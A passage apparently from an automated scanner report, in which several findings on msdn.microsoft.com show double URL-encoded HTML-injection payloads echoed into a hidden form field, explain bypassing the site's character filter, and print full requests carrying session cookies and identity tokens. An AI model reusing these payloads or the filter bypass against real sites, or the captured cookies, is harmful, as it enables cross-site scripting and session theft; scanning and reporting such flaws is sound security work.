17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9215 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:16:06 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10797d1"><a>5235629b1dd" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e862a%2522%253e%253ca%253e3fcd2f23dad was submitted in the REST URL parameter 1. This input was echoed as e862a"><a>3fcd2f23dad in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-use862a%2522%253e%253ca%253e3fcd2f23dad/library/dd208104(PROT.10).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9217 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use862a"><a>3fcd2f23dad/library/dd208104(PROT.10)" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a0%2522%253e%253ca%253eb3def3ef286 was submitted in the REST URL parameter 2. This input was echoed as 653a0"><a>b3def3ef286 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library653a0%2522%253e%253ca%253eb3def3ef286/dd208104(PROT.10).aspx HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9217 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library653a0"><a>b3def3ef286/dd208104(PROT.10)" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32d6f%2522%253e%253ca%253e13799d99661 was submitted in the REST URL parameter 3. This input was echoed as 32d6f"><a>13799d99661 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/dd208104(PROT.10).aspx32d6f%2522%253e%253ca%253e13799d99661 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9227 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:50 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd208104(PROT.10).aspx32d6f"><a>13799d99661" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e81ea%2522%253e%253ca%253e6a2a9f3482d was submitted in the REST URL parameter 1. This input was echoed as e81ea"><a>6a2a9f3482d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-use81ea%2522%253e%253ca%253e6a2a9f3482d/library/dd582937(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:13:57 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-use81ea"><a>6a2a9f3482d/library/dd582937(office.11" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74342%2522%253e%253ca%253eb95c098f3cf was submitted in the REST URL parameter 2. This input was echoed as 74342"><a>b95c098f3cf in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library74342%2522%253e%253ca%253eb95c098f3cf/dd582937(office.11 HTTP/1.1 Host: msdn.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 9219 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:14:10 GMT
